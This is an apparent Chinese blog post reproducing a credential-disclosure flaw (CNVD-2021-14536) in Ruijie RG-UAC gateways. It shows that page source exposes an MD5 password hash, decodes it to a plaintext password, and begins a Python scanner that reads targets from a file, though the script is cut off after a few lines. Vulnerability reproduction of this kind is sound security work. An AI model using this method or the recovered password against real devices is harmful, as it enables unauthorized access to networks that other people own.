复现锐捷RG-UAC系统账号密码信息泄露漏洞编写poc/exp(CNVD-2021-14536)

本文介绍了一种使用Python脚本进行漏洞扫描的方法,并演示了如何通过访问特定URL来验证存在的漏洞。脚本会检查目标站点是否包含敏感信息如用户名和密码等,并通过正则表达式解析这些信息。

漏洞演示

访问地址
在这里插入图片描述
f12查看源代码
在这里插入图片描述
md5解码:

md5加密 解码
40b5daa2352b825d66b8080617408284 reach123

在这里插入图片描述
登录成功
在这里插入图片描述

poc/exp验证

import requests
import re

def start(headers):
    with open("1.txt", "r") as f:
        for f1 in f:
            f2 
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值